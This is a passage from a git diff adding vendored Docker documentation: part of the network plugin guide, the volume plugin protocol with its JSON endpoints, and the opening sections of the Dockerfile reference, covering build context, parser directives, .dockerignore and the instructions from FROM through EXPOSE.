+When you run Docker Engine outside of swarm mode, all networking plugins that
+worked in Docker 1.11 will continue to function normally. They do not require
+any modification.
+
+## Using network driver plugins
+
+The means of installing and running a network driver plugin depend on the
+particular plugin. So, be sure to install your plugin according to the
+instructions obtained from the plugin developer.
+
+Once running however, network driver plugins are used just like the built-in
+network drivers: by being mentioned as a driver in network-oriented Docker
+commands. For example,
+
+    $ docker network create --driver weave mynet
+
+Some network driver plugins are listed in [plugins](legacy_plugins.md)
+
+The `mynet` network is now owned by `weave`, so subsequent commands
+referring to that network will be sent to the plugin,
+
+    $ docker run --network=mynet busybox top
+
+
+## Write a network plugin
+
+Network plugins implement the [Docker plugin
+API](plugin_api.md) and the network plugin protocol
+
+## Network plugin protocol
+
+The network driver protocol, in addition to the plugin activation call, is
+documented as part of libnetwork:
+[https://github.com/docker/libnetwork/blob/master/docs/remote.md](https://github.com/docker/libnetwork/blob/master/docs/remote.md).
+
+# Related Information
+
+To interact with the Docker maintainers and other interested users, see the IRC channel `#docker-network`.
+
+-  [Docker networks feature overview](https://docs.docker.com/engine/userguide/networking/)
+-  The [LibNetwork](https://github.com/docker/libnetwork) project
diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_volume.md b/vendor/github.com/docker/docker/docs/extend/plugins_volume.md
new file mode 100644
index 0000000000..c060bf39b1
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/extend/plugins_volume.md
@@ -0,0 +1,276 @@
+---
+title: "Volume plugins"
+description: "How to manage data with external volume plugins"
+keywords: "Examples, Usage, volume, docker, data, volumes, plugin, api"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# Write a volume plugin
+
+Docker Engine volume plugins enable Engine deployments to be integrated with
+external storage systems, such as Amazon EBS, and enable data volumes to persist
+beyond the lifetime of a single Engine host. See the
+[plugin documentation](legacy_plugins.md) for more information.
+
+## Changelog
+
+### 1.13.0
+
+- If used as part of the v2 plugin architecture, mountpoints that are part of paths returned by plugin have to be mounted under the directory specified by PropagatedMount in the plugin configuration [#26398](https://github.com/docker/docker/pull/26398)
+
+### 1.12.0
+
+- Add `Status` field to `VolumeDriver.Get` response ([#21006](https://github.com/docker/docker/pull/21006#))
+- Add `VolumeDriver.Capabilities` to get capabilities of the volume driver([#22077](https://github.com/docker/docker/pull/22077))
+
+### 1.10.0
+
+- Add `VolumeDriver.Get` which gets the details about the volume ([#16534](https://github.com/docker/docker/pull/16534))
+- Add `VolumeDriver.List` which lists all volumes owned by the driver ([#16534](https://github.com/docker/docker/pull/16534))
+
+### 1.8.0
+
+- Initial support for volume driver plugins ([#14659](https://github.com/docker/docker/pull/14659))
+
+## Command-line changes
+
+A volume plugin makes use of the `-v`and `--volume-driver` flag on the `docker run` command.  The `-v` flag accepts a volume name and the `--volume-driver` flag a driver type, for example:
+
+    $ docker run -ti -v volumename:/data --volume-driver=flocker   busybox sh
+
+This command passes the `volumename` through to the volume plugin as a
+user-given name for the volume. The `volumename` must not begin with a `/`.
+
+By having the user specify a  `volumename`, a plugin can associate the volume
+with an external volume beyond the lifetime of a single container or container
+host. This can be used, for example, to move a stateful container from one
+server to another.
+
+By specifying a `volumedriver` in conjunction with a `volumename`, users can use plugins such as [Flocker](https://clusterhq.com/docker-plugin/) to manage volumes external to a single host, such as those on EBS.
+
+
+## Create a VolumeDriver
+
+The container creation endpoint (`/containers/create`) accepts a `VolumeDriver`
+field of type `string` allowing to specify the name of the driver. It's default
+value of `"local"` (the default driver for local volumes).
+
+## Volume plugin protocol
+
+If a plugin registers itself as a `VolumeDriver` when activated, then it is
+expected to provide writeable paths on the host filesystem for the Docker
+daemon to provide to containers to consume.
+
+The Docker daemon handles bind-mounting the provided paths into user
+containers.
+
+> **Note**: Volume plugins should *not* write data to the `/var/lib/docker/`
+> directory, including `/var/lib/docker/volumes`. The `/var/lib/docker/`
+> directory is reserved for Docker.
+
+### /VolumeDriver.Create
+
+**Request**:
+```json
+{
+    "Name": "volume_name",
+    "Opts": {}
+}
+```
+
+Instruct the plugin that the user wants to create a volume, given a user
+specified volume name.  The plugin does not need to actually manifest the
+volume on the filesystem yet (until Mount is called).
+Opts is a map of driver specific options passed through from the user request.
+
+**Response**:
+```json
+{
+    "Err": ""
+}
+```
+
+Respond with a string error if an error occurred.
+
+### /VolumeDriver.Remove
+
+**Request**:
+```json
+{
+    "Name": "volume_name"
+}
+```
+
+Delete the specified volume from disk. This request is issued when a user invokes `docker rm -v` to remove volumes associated with a container.
+
+**Response**:
+```json
+{
+    "Err": ""
+}
+```
+
+Respond with a string error if an error occurred.
+
+### /VolumeDriver.Mount
+
+**Request**:
+```json
+{
+    "Name": "volume_name",
+    "ID": "b87d7442095999a92b65b3d9691e697b61713829cc0ffd1bb72e4ccd51aa4d6c"
+}
+```
+
+Docker requires the plugin to provide a volume, given a user specified volume
+name. This is called once per container start. If the same volume_name is requested
+more than once, the plugin may need to keep track of each new mount request and provision
+at the first mount request and deprovision at the last corresponding unmount request.
+
+`ID` is a unique ID for the caller that is requesting the mount.
+
+**Response**:
+```json
+{
+    "Mountpoint": "/path/to/directory/on/host",
+    "Err": ""
+}
+```
+
+Respond with the path on the host filesystem where the volume has been made
+available, and/or a string error if an error occurred.
+
+### /VolumeDriver.Path
+
+**Request**:
+```json
+{
+    "Name": "volume_name"
+}
+```
+
+Docker needs reminding of the path to the volume on the host.
+
+**Response**:
+```json
+{
+    "Mountpoint": "/path/to/directory/on/host",
+    "Err": ""
+}
+```
+
+Respond with the path on the host filesystem where the volume has been made
+available, and/or a string error if an error occurred. `Mountpoint` is optional,
+however the plugin may be queried again later if one is not provided.
+
+### /VolumeDriver.Unmount
+
+**Request**:
+```json
+{
+    "Name": "volume_name",
+    "ID": "b87d7442095999a92b65b3d9691e697b61713829cc0ffd1bb72e4ccd51aa4d6c"
+}
+```
+
+Indication that Docker no longer is using the named volume. This is called once
+per container stop.  Plugin may deduce that it is safe to deprovision it at
+this point.
+
+`ID` is a unique ID for the caller that is requesting the mount.
+
+**Response**:
+```json
+{
+    "Err": ""
+}
+```
+
+Respond with a string error if an error occurred.
+
+
+### /VolumeDriver.Get
+
+**Request**:
+```json
+{
+    "Name": "volume_name"
+}
+```
+
+Get the volume info.
+
+
+**Response**:
+```json
+{
+  "Volume": {
+    "Name": "volume_name",
+    "Mountpoint": "/path/to/directory/on/host",
+    "Status": {}
+  },
+  "Err": ""
+}
+```
+
+Respond with a string error if an error occurred. `Mountpoint` and `Status` are
+optional.
+
+
+### /VolumeDriver.List
+
+**Request**:
+```json
+{}
+```
+
+Get the list of volumes registered with the plugin.
+
+**Response**:
+```json
+{
+  "Volumes": [
+    {
+      "Name": "volume_name",
+      "Mountpoint": "/path/to/directory/on/host"
+    }
+  ],
+  "Err": ""
+}
+```
+
+Respond with a string error if an error occurred. `Mountpoint` is optional.
+
+### /VolumeDriver.Capabilities
+
+**Request**:
+```json
+{}
+```
+
+Get the list of capabilities the driver supports.
+The driver is not required to implement this endpoint, however in such cases
+the default values will be taken.
+
+**Response**:
+```json
+{
+  "Capabilities": {
+    "Scope": "global"
+  }
+}
+```
+
+Supported scopes are `global` and `local`. Any other value in `Scope` will be
+ignored and assumed to be `local`. Scope allows cluster managers to handle the
+volume differently, for instance with a scope of `global`, the cluster manager
+knows it only needs to create the volume once instead of on every engine. More
+capabilities may be added in the future.
diff --git a/vendor/github.com/docker/docker/docs/reference/builder.md b/vendor/github.com/docker/docker/docs/reference/builder.md
new file mode 100644
index 0000000000..6fa5a24150
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/builder.md
@@ -0,0 +1,1746 @@
+---
+title: "Dockerfile reference"
+description: "Dockerfiles use a simple DSL which allows you to automate the steps you would normally manually take to create an image."
+keywords: "builder, docker, Dockerfile, automation, image creation"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# Dockerfile reference
+
+Docker can build images automatically by reading the instructions from a
+`Dockerfile`. A `Dockerfile` is a text document that contains all the commands a
+user could call on the command line to assemble an image. Using `docker build`
+users can create an automated build that executes several command-line
+instructions in succession.
+
+This page describes the commands you can use in a `Dockerfile`. When you are
+done reading this page, refer to the [`Dockerfile` Best
+Practices](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/) for a tip-oriented guide.
+
+## Usage
+
+The [`docker build`](commandline/build.md) command builds an image from
+a `Dockerfile` and a *context*. The build's context is the files at a specified
+location `PATH` or `URL`. The `PATH` is a directory on your local filesystem.
+The `URL` is a Git repository location.
+
+A context is processed recursively. So, a `PATH` includes any subdirectories and
+the `URL` includes the repository and its submodules. A simple build command
+that uses the current directory as context:
+
+    $ docker build .
+    Sending build context to Docker daemon  6.51 MB
+    ...
+
+The build is run by the Docker daemon, not by the CLI. The first thing a build
+process does is send the entire context (recursively) to the daemon.  In most
+cases, it's best to start with an empty directory as context and keep your
+Dockerfile in that directory. Add only the files needed for building the
+Dockerfile.
+
+>**Warning**: Do not use your root directory, `/`, as the `PATH` as it causes
+>the build to transfer the entire contents of your hard drive to the Docker
+>daemon.
+
+To use a file in the build context, the `Dockerfile` refers to the file specified
+in an instruction, for example,  a `COPY` instruction. To increase the build's
+performance, exclude files and directories by adding a `.dockerignore` file to
+the context directory.  For information about how to [create a `.dockerignore`
+file](#dockerignore-file) see the documentation on this page.
+
+Traditionally, the `Dockerfile` is called `Dockerfile` and located in the root
+of the context. You use the `-f` flag with `docker build` to point to a Dockerfile
+anywhere in your file system.
+
+    $ docker build -f /path/to/a/Dockerfile .
+
+You can specify a repository and tag at which to save the new image if
+the build succeeds:
+
+    $ docker build -t shykes/myapp .
+
+To tag the image into multiple repositories after the build,
+add multiple `-t` parameters when you run the `build` command:
+
+    $ docker build -t shykes/myapp:1.0.2 -t shykes/myapp:latest .
+
+Before the Docker daemon runs the instructions in the `Dockerfile`, it performs
+a preliminary validation of the `Dockerfile` and returns an error if the syntax is incorrect:
+
+    $ docker build -t test/myapp .
+    Sending build context to Docker daemon 2.048 kB
+    Error response from daemon: Unknown instruction: RUNCMD
+
+The Docker daemon runs the instructions in the `Dockerfile` one-by-one,
+committing the result of each instruction
+to a new image if necessary, before finally outputting the ID of your
+new image. The Docker daemon will automatically clean up the context you
+sent.
+
+Note that each instruction is run independently, and causes a new image
+to be created - so `RUN cd /tmp` will not have any effect on the next
+instructions.
+
+Whenever possible, Docker will re-use the intermediate images (cache),
+to accelerate the `docker build` process significantly. This is indicated by
+the `Using cache` message in the console output.
+(For more information, see the [Build cache section](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache)) in the
+`Dockerfile` best practices guide:
+
+    $ docker build -t svendowideit/ambassador .
+    Sending build context to Docker daemon 15.36 kB
+    Step 1/4 : FROM alpine:3.2
+     ---> 31f630c65071
+    Step 2/4 : MAINTAINER SvenDowideit@home.org.au
+     ---> Using cache
+     ---> 2a1c91448f5f
+    Step 3/4 : RUN apk update &&      apk add socat &&        rm -r /var/cache/
+     ---> Using cache
+     ---> 21ed6e7fbb73
+    Step 4/4 : CMD env | grep _TCP= | (sed 's/.*_PORT_\([0-9]*\)_TCP=tcp:\/\/\(.*\):\(.*\)/socat -t 100000000 TCP4-LISTEN:\1,fork,reuseaddr TCP4:\2:\3 \&/' && echo wait) | sh
+     ---> Using cache
+     ---> 7ea8aef582cc
+    Successfully built 7ea8aef582cc
+
+Build cache is only used from images that have a local parent chain. This means
+that these images were created by previous builds or the whole chain of images
+was loaded with `docker load`. If you wish to use build cache of a specific
+image you can specify it with `--cache-from` option. Images specified with
+`--cache-from` do not need to have a parent chain and may be pulled from other
+registries.
+
+When you're done with your build, you're ready to look into [*Pushing a
+repository to its registry*](https://docs.docker.com/engine/tutorials/dockerrepos/#/contributing-to-docker-hub).
+
+## Format
+
+Here is the format of the `Dockerfile`:
+
+```Dockerfile
+# Comment
+INSTRUCTION arguments
+```
+
+The instruction is not case-sensitive. However, convention is for them to
+be UPPERCASE to distinguish them from arguments more easily.
+
+
+Docker runs instructions in a `Dockerfile` in order. **The first
+instruction must be \`FROM\`** in order to specify the [*Base
+Image*](glossary.md#base-image) from which you are building.
+
+Docker treats lines that *begin* with `#` as a comment, unless the line is
+a valid [parser directive](#parser-directives). A `#` marker anywhere
+else in a line is treated as an argument. This allows statements like:
+
+```Dockerfile
+# Comment
+RUN echo 'we are running some # of cool things'
+```
+
+Line continuation characters are not supported in comments.
+
+## Parser directives
+
+Parser directives are optional, and affect the way in which subsequent lines
+in a `Dockerfile` are handled. Parser directives do not add layers to the build,
+and will not be shown as a build step. Parser directives are written as a
+special type of comment in the form `# directive=value`. A single directive
+may only be used once.
+
+Once a comment, empty line or builder instruction has been processed, Docker
+no longer looks for parser directives. Instead it treats anything formatted
+as a parser directive as a comment and does not attempt to validate if it might
+be a parser directive. Therefore, all parser directives must be at the very
+top of a `Dockerfile`.
+
+Parser directives are not case-sensitive. However, convention is for them to
+be lowercase. Convention is also to include a blank line following any
+parser directives. Line continuation characters are not supported in parser
+directives.
+
+Due to these rules, the following examples are all invalid:
+
+Invalid due to line continuation:
+
+```Dockerfile
+# direc \
+tive=value
+```
+
+Invalid due to appearing twice:
+
+```Dockerfile
+# directive=value1
+# directive=value2
+
+FROM ImageName
+```
+
+Treated as a comment due to appearing after a builder instruction:
+
+```Dockerfile
+FROM ImageName
+# directive=value
+```
+
+Treated as a comment due to appearing after a comment which is not a parser
+directive:
+
+```Dockerfile
+# About my dockerfile
+FROM ImageName
+# directive=value
+```
+
+The unknown directive is treated as a comment due to not being recognized. In
+addition, the known directive is treated as a comment due to appearing after
+a comment which is not a parser directive.
+
+```Dockerfile
+# unknowndirective=value
+# knowndirective=value
+```
+
+Non line-breaking whitespace is permitted in a parser directive. Hence, the
+following lines are all treated identically:
+
+```Dockerfile
+#directive=value
+# directive =value
+#	directive= value
+# directive = value
+#	  dIrEcTiVe=value
+```
+
+The following parser directive is supported:
+
+* `escape`
+
+## escape
+
+    # escape=\ (backslash)
+
+Or
+
+    # escape=` (backtick)
+
+The `escape` directive sets the character used to escape characters in a
+`Dockerfile`. If not specified, the default escape character is `\`.
+
+The escape character is used both to escape characters in a line, and to
+escape a newline. This allows a `Dockerfile` instruction to
+span multiple lines. Note that regardless of whether the `escape` parser
+directive is included in a `Dockerfile`, *escaping is not performed in
+a `RUN` command, except at the end of a line.*
+
+Setting the escape character to `` ` `` is especially useful on
+`Windows`, where `\` is the directory path separator. `` ` `` is consistent
+with [Windows PowerShell](https://technet.microsoft.com/en-us/library/hh847755.aspx).
+
+Consider the following example which would fail in a non-obvious way on
+`Windows`. The second `\` at the end of the second line would be interpreted as an
+escape for the newline, instead of a target of the escape from the first `\`.
+Similarly, the `\` at the end of the third line would, assuming it was actually
+handled as an instruction, cause it be treated as a line continuation. The result
+of this dockerfile is that second and third lines are considered a single
+instruction:
+
+```Dockerfile
+FROM microsoft/nanoserver
+COPY testfile.txt c:\\
+RUN dir c:\
+```
+
+Results in:
+
+    PS C:\John> docker build -t cmd .
+    Sending build context to Docker daemon 3.072 kB
+    Step 1/2 : FROM microsoft/nanoserver
+     ---> 22738ff49c6d
+    Step 2/2 : COPY testfile.txt c:\RUN dir c:
+    GetFileAttributesEx c:RUN: The system cannot find the file specified.
+    PS C:\John>
+
+One solution to the above would be to use `/` as the target of both the `COPY`
+instruction, and `dir`. However, this syntax is, at best, confusing as it is not
+natural for paths on `Windows`, and at worst, error prone as not all commands on
+`Windows` support `/` as the path separator.
+
+By adding the `escape` parser directive, the following `Dockerfile` succeeds as
+expected with the use of natural platform semantics for file paths on `Windows`:
+
+    # escape=`
+
+    FROM microsoft/nanoserver
+    COPY testfile.txt c:\
+    RUN dir c:\
+
+Results in:
+
+    PS C:\John> docker build -t succeeds --no-cache=true .
+    Sending build context to Docker daemon 3.072 kB
+    Step 1/3 : FROM microsoft/nanoserver
+     ---> 22738ff49c6d
+    Step 2/3 : COPY testfile.txt c:\
+     ---> 96655de338de
+    Removing intermediate container 4db9acbb1682
+    Step 3/3 : RUN dir c:\
+     ---> Running in a2c157f842f5
+     Volume in drive C has no label.
+     Volume Serial Number is 7E6D-E0F7
+    
+     Directory of c:\
+    
+    10/05/2016  05:04 PM             1,894 License.txt
+    10/05/2016  02:22 PM    <DIR>          Program Files
+    10/05/2016  02:14 PM    <DIR>          Program Files (x86)
+    10/28/2016  11:18 AM                62 testfile.txt
+    10/28/2016  11:20 AM    <DIR>          Users
+    10/28/2016  11:20 AM    <DIR>          Windows
+               2 File(s)          1,956 bytes
+               4 Dir(s)  21,259,096,064 bytes free
+     ---> 01c7f3bef04f
+    Removing intermediate container a2c157f842f5
+    Successfully built 01c7f3bef04f
+    PS C:\John>
+
+## Environment replacement
+
+Environment variables (declared with [the `ENV` statement](#env)) can also be
+used in certain instructions as variables to be interpreted by the
+`Dockerfile`. Escapes are also handled for including variable-like syntax
+into a statement literally.
+
+Environment variables are notated in the `Dockerfile` either with
+`$variable_name` or `${variable_name}`. They are treated equivalently and the
+brace syntax is typically used to address issues with variable names with no
+whitespace, like `${foo}_bar`.
+
+The `${variable_name}` syntax also supports a few of the standard `bash`
+modifiers as specified below:
+
+* `${variable:-word}` indicates that if `variable` is set then the result
+  will be that value. If `variable` is not set then `word` will be the result.
+* `${variable:+word}` indicates that if `variable` is set then `word` will be
+  the result, otherwise the result is the empty string.
+
+In all cases, `word` can be any string, including additional environment
+variables.
+
+Escaping is possible by adding a `\` before the variable: `\$foo` or `\${foo}`,
+for example, will translate to `$foo` and `${foo}` literals respectively.
+
+Example (parsed representation is displayed after the `#`):
+
+    FROM busybox
+    ENV foo /bar
+    WORKDIR ${foo}   # WORKDIR /bar
+    ADD . $foo       # ADD . /bar
+    COPY \$foo /quux # COPY $foo /quux
+
+Environment variables are supported by the following list of instructions in
+the `Dockerfile`:
+
+* `ADD`
+* `COPY`
+* `ENV`
+* `EXPOSE`
+* `LABEL`
+* `USER`
+* `WORKDIR`
+* `VOLUME`
+* `STOPSIGNAL`
+
+as well as:
+
+* `ONBUILD` (when combined with one of the supported instructions above)
+
+> **Note**:
+> prior to 1.4, `ONBUILD` instructions did **NOT** support environment
+> variable, even when combined with any of the instructions listed above.
+
+Environment variable substitution will use the same value for each variable
+throughout the entire command. In other words, in this example:
+
+    ENV abc=hello
+    ENV abc=bye def=$abc
+    ENV ghi=$abc
+
+will result in `def` having a value of `hello`, not `bye`. However,
+`ghi` will have a value of `bye` because it is not part of the same command
+that set `abc` to `bye`.
+
+## .dockerignore file
+
+Before the docker CLI sends the context to the docker daemon, it looks
+for a file named `.dockerignore` in the root directory of the context.
+If this file exists, the CLI modifies the context to exclude files and
+directories that match patterns in it.  This helps to avoid
+unnecessarily sending large or sensitive files and directories to the
+daemon and potentially adding them to images using `ADD` or `COPY`.
+
+The CLI interprets the `.dockerignore` file as a newline-separated
+list of patterns similar to the file globs of Unix shells.  For the
+purposes of matching, the root of the context is considered to be both
+the working and the root directory.  For example, the patterns
+`/foo/bar` and `foo/bar` both exclude a file or directory named `bar`
+in the `foo` subdirectory of `PATH` or in the root of the git
+repository located at `URL`.  Neither excludes anything else.
+
+If a line in `.dockerignore` file starts with `#` in column 1, then this line is
+considered as a comment and is ignored before interpreted by the CLI.
+
+Here is an example `.dockerignore` file:
+
+```
+# comment
+    */temp*
+    */*/temp*
+    temp?
+```
+
+This file causes the following build behavior:
+
+| Rule           | Behavior                                                                                                                                                                     |
+|----------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
+| `# comment`    | Ignored.                 |
+| `*/temp*`      | Exclude files and directories whose names start with `temp` in any immediate subdirectory of the root.  For example, the plain file `/somedir/temporary.txt` is excluded, as is the directory `/somedir/temp`.                 |
+| `*/*/temp*`    | Exclude files and directories starting with `temp` from any subdirectory that is two levels below the root. For example, `/somedir/subdir/temporary.txt` is excluded. |
+| `temp?`        | Exclude files and directories in the root directory whose names are a one-character extension of `temp`.  For example, `/tempa` and `/tempb` are excluded.
+
+
+Matching is done using Go's
+[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules.  A
+preprocessing step removes leading and trailing whitespace and
+eliminates `.` and `..` elements using Go's
+[filepath.Clean](http://golang.org/pkg/path/filepath/#Clean).  Lines
+that are blank after preprocessing are ignored.
+
+Beyond Go's filepath.Match rules, Docker also supports a special
+wildcard string `**` that matches any number of directories (including
+zero). For example, `**/*.go` will exclude all files that end with `.go`
+that are found in all directories, including the root of the build context.
+
+Lines starting with `!` (exclamation mark) can be used to make exceptions
+to exclusions.  The following is an example `.dockerignore` file that
+uses this mechanism:
+
+```
+    *.md
+    !README.md
+```
+
+All markdown files *except* `README.md` are excluded from the context.
+
+The placement of `!` exception rules influences the behavior: the last
+line of the `.dockerignore` that matches a particular file determines
+whether it is included or excluded.  Consider the following example:
+
+```
+    *.md
+    !README*.md
+    README-secret.md
+```
+
+No markdown files are included in the context except README files other than
+`README-secret.md`.
+
+Now consider this example:
+
+```
+    *.md
+    README-secret.md
+    !README*.md
+```
+
+All of the README files are included.  The middle line has no effect because
+`!README*.md` matches `README-secret.md` and comes last.
+
+You can even use the `.dockerignore` file to exclude the `Dockerfile`
+and `.dockerignore` files.  These files are still sent to the daemon
+because it needs them to do its job.  But the `ADD` and `COPY` commands
+do not copy them to the image.
+
+Finally, you may want to specify which files to include in the
+context, rather than which to exclude. To achieve this, specify `*` as
+the first pattern, followed by one or more `!` exception patterns.
+
+**Note**: For historical reasons, the pattern `.` is ignored.
+
+## FROM
+
+    FROM <image>
+
+Or
+
+    FROM <image>:<tag>
+
+Or
+
+    FROM <image>@<digest>
+
+The `FROM` instruction sets the [*Base Image*](glossary.md#base-image)
+for subsequent instructions. As such, a valid `Dockerfile` must have `FROM` as
+its first instruction. The image can be any valid image – it is especially easy
+to start by **pulling an image** from the [*Public Repositories*](https://docs.docker.com/engine/tutorials/dockerrepos/).
+
+- `FROM` must be the first non-comment instruction in the `Dockerfile`.
+
+- `FROM` can appear multiple times within a single `Dockerfile` in order to create
+multiple images. Simply make a note of the last image ID output by the commit
+before each new `FROM` command.
+
+- The `tag` or `digest` values are optional. If you omit either of them, the builder
+assumes a `latest` by default. The builder returns an error if it cannot match
+the `tag` value.
+
+## RUN
+
+RUN has 2 forms:
+
+- `RUN <command>` (*shell* form, the command is run in a shell, which by
+default is `/bin/sh -c` on Linux or `cmd /S /C` on Windows)
+- `RUN ["executable", "param1", "param2"]` (*exec* form)
+
+The `RUN` instruction will execute any commands in a new layer on top of the
+current image and commit the results. The resulting committed image will be
+used for the next step in the `Dockerfile`.
+
+Layering `RUN` instructions and generating commits conforms to the core
+concepts of Docker where commits are cheap and containers can be created from
+any point in an image's history, much like source control.
+
+The *exec* form makes it possible to avoid shell string munging, and to `RUN`
+commands using a base image that does not contain the specified shell executable.
+
+The default shell for the *shell* form can be changed using the `SHELL`
+command.
+
+In the *shell* form you can use a `\` (backslash) to continue a single
+RUN instruction onto the next line. For example, consider these two lines:
+
+```
+RUN /bin/bash -c 'source $HOME/.bashrc; \
+echo $HOME'
+```
+Together they are equivalent to this single line:
+
+```
+RUN /bin/bash -c 'source $HOME/.bashrc; echo $HOME'
+```
+
+> **Note**:
+> To use a different shell, other than '/bin/sh', use the *exec* form
+> passing in the desired shell. For example,
+> `RUN ["/bin/bash", "-c", "echo hello"]`
+
+> **Note**:
+> The *exec* form is parsed as a JSON array, which means that
+> you must use double-quotes (") around words not single-quotes (').
+
+> **Note**:
+> Unlike the *shell* form, the *exec* form does not invoke a command shell.
+> This means that normal shell processing does not happen. For example,
+> `RUN [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`.
+> If you want shell processing then either use the *shell* form or execute
+> a shell directly, for example: `RUN [ "sh", "-c", "echo $HOME" ]`.
+> When using the exec form and executing a shell directly, as in the case for
+> the shell form, it is the shell that is doing the environment variable
+> expansion, not docker.
+>
+> **Note**:
+> In the *JSON* form, it is necessary to escape backslashes. This is
+> particularly relevant on Windows where the backslash is the path separator.
+> The following line would otherwise be treated as *shell* form due to not
+> being valid JSON, and fail in an unexpected way:
+> `RUN ["c:\windows\system32\tasklist.exe"]`
+> The correct syntax for this example is:
+> `RUN ["c:\\windows\\system32\\tasklist.exe"]`
+
+The cache for `RUN` instructions isn't invalidated automatically during
+the next build. The cache for an instruction like
+`RUN apt-get dist-upgrade -y` will be reused during the next build. The
+cache for `RUN` instructions can be invalidated by using the `--no-cache`
+flag, for example `docker build --no-cache`.
+
+See the [`Dockerfile` Best Practices
+guide](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache) for more information.
+
+The cache for `RUN` instructions can be invalidated by `ADD` instructions. See
+[below](#add) for details.
+
+### Known issues (RUN)
+
+- [Issue 783](https://github.com/docker/docker/issues/783) is about file
+  permissions problems that can occur when using the AUFS file system. You
+  might notice it during an attempt to `rm` a file, for example.
+
+  For systems that have recent aufs version (i.e., `dirperm1` mount option can
+  be set), docker will attempt to fix the issue automatically by mounting
+  the layers with `dirperm1` option. More details on `dirperm1` option can be
+  found at [`aufs` man page](https://github.com/sfjro/aufs3-linux/tree/aufs3.18/Documentation/filesystems/aufs)
+
+  If your system doesn't have support for `dirperm1`, the issue describes a workaround.
+
+## CMD
+
+The `CMD` instruction has three forms:
+
+- `CMD ["executable","param1","param2"]` (*exec* form, this is the preferred form)
+- `CMD ["param1","param2"]` (as *default parameters to ENTRYPOINT*)
+- `CMD command param1 param2` (*shell* form)
+
+There can only be one `CMD` instruction in a `Dockerfile`. If you list more than one `CMD`
+then only the last `CMD` will take effect.
+
+**The main purpose of a `CMD` is to provide defaults for an executing
+container.** These defaults can include an executable, or they can omit
+the executable, in which case you must specify an `ENTRYPOINT`
+instruction as well.
+
+> **Note**:
+> If `CMD` is used to provide default arguments for the `ENTRYPOINT`
+> instruction, both the `CMD` and `ENTRYPOINT` instructions should be specified
+> with the JSON array format.
+
+> **Note**:
+> The *exec* form is parsed as a JSON array, which means that
+> you must use double-quotes (") around words not single-quotes (').
+
+> **Note**:
+> Unlike the *shell* form, the *exec* form does not invoke a command shell.
+> This means that normal shell processing does not happen. For example,
+> `CMD [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`.
+> If you want shell processing then either use the *shell* form or execute
+> a shell directly, for example: `CMD [ "sh", "-c", "echo $HOME" ]`.
+> When using the exec form and executing a shell directly, as in the case for
+> the shell form, it is the shell that is doing the environment variable
+> expansion, not docker.
+
+When used in the shell or exec formats, the `CMD` instruction sets the command
+to be executed when running the image.
+
+If you use the *shell* form of the `CMD`, then the `<command>` will execute in
+`/bin/sh -c`:
+
+    FROM ubuntu
+    CMD echo "This is a test." | wc -
+
+If you want to **run your** `<command>` **without a shell** then you must
+express the command as a JSON array and give the full path to the executable.
+**This array form is the preferred format of `CMD`.** Any additional parameters
+must be individually expressed as strings in the array:
+
+    FROM ubuntu
+    CMD ["/usr/bin/wc","--help"]
+
+If you would like your container to run the same executable every time, then
+you should consider using `ENTRYPOINT` in combination with `CMD`. See
+[*ENTRYPOINT*](#entrypoint).
+
+If the user specifies arguments to `docker run` then they will override the
+default specified in `CMD`.
+
+> **Note**:
+> Don't confuse `RUN` with `CMD`. `RUN` actually runs a command and commits
+> the result; `CMD` does not execute anything at build time, but specifies
+> the intended command for the image.
+
+## LABEL
+
+    LABEL <key>=<value> <key>=<value> <key>=<value> ...
+
+The `LABEL` instruction adds metadata to an image. A `LABEL` is a
+key-value pair. To include spaces within a `LABEL` value, use quotes and
+backslashes as you would in command-line parsing. A few usage examples:
+
+    LABEL "com.example.vendor"="ACME Incorporated"
+    LABEL com.example.label-with-value="foo"
+    LABEL version="1.0"
+    LABEL description="This text illustrates \
+    that label-values can span multiple lines."
+
+An image can have more than one label. To specify multiple labels,
+Docker recommends combining labels into a single `LABEL` instruction where
+possible. Each `LABEL` instruction produces a new layer which can result in an
+inefficient image if you use many labels. This example results in a single image
+layer.
+
+    LABEL multi.label1="value1" multi.label2="value2" other="value3"
+
+The above can also be written as:
+
+    LABEL multi.label1="value1" \
+          multi.label2="value2" \
+          other="value3"
+
+Labels are additive including `LABEL`s in `FROM` images. If Docker
+encounters a label/key that already exists, the new value overrides any previous
+labels with identical keys.
+
+To view an image's labels, use the `docker inspect` command.
+
+    "Labels": {
+        "com.example.vendor": "ACME Incorporated"
+        "com.example.label-with-value": "foo",
+        "version": "1.0",
+        "description": "This text illustrates that label-values can span multiple lines.",
+        "multi.label1": "value1",
+        "multi.label2": "value2",
+        "other": "value3"
+    },
+
+## MAINTAINER (deprecated)
+
+    MAINTAINER <name>
+
+The `MAINTAINER` instruction sets the *Author* field of the generated images.
+The `LABEL` instruction is a much more flexible version of this and you should use
+it instead, as it enables setting any metadata you require, and can be viewed
+easily, for example with `docker inspect`. To set a label corresponding to the
+`MAINTAINER` field you could use:
+
+    LABEL maintainer "SvenDowideit@home.org.au"
+
+This will then be visible from `docker inspect` with the other labels.
+
+## EXPOSE
+
+    EXPOSE <port> [<port>...]
+
+The `EXPOSE` instruction informs Docker that the container listens on the
+specified network ports at runtime. `EXPOSE` does not make the ports of the
+container accessible to the host. To do that, you must use either the `-p` flag
+to publish a range of ports or the `-P` flag to publish all of the exposed
+ports. You can expose one port number and publish it externally under another
+number.
+
+To set up port redirection on the host system, see [using the -P
+flag](run.md#expose-incoming-ports). The Docker network feature supports
+creating networks without the need to expose ports within the network, for
